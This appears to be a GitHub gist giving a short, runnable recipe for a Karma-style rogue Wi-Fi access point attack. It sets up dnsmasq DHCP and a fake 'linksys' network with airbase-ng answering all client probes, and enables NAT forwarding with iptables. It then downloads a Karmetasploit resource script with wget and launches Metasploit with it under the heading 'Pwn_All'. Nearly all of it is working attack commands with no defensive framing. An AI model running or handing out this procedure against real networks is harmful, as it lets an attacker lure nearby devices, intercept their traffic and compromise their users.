Last active
September 13, 2024 18:23
-
-
Save Patrick-Kelley/2e6dcef3d2e4e3a870b7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# If you want dnsmasq to listen for DHCP and DNS requests only on | |
# specified interfaces (and the loopback) give the name of the | |
# interface (eg eth0) here. | |
# Repeat the line for more than one interface. | |
interface=at0 | |
#interface=wlan0mon | |
#interface=wlan0 | |
# Uncomment this to enable the integrated DHCP server, you need | |
# to supply the range of addresses available for lease and optionally | |
# a lease time. If you have more than one network, you will need to | |
# repeat this for each network on which you want to supply DHCP | |
# service. | |
dhcp-range=10.10.10.50,10.10.10.150,12h | |
Start airmon-ng on wlan0 | |
airmon-ng start wlan0 | |
Start Airbase with your defined SSID. The -P will cause Airbase to attempt negotiation of all received beacons. This will also create a bridge interface (at0) | |
airbase-ng -P -C 30 -e "linksys" -v wlan0mon | |
Add and set the configuration of the at0 | |
ifconfig at0 up 10.10.10.1 netmask 255.255.255.0 | |
Setup Traffic Forwarding | |
modprobe iptable_nat | |
iptables -A FORWARD -i wlan0mon -j ACCEPT | |
iptables -A FORWARD -i at0 -j ACCEPT | |
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
Start DNSMASQ | |
service dnsmasq restart | |
Install Karmetasploit | |
cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt | |
Run Metasploit with Pwn_All | |
msfconsole -q -r /opt/karma.rc_.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Pushing into public.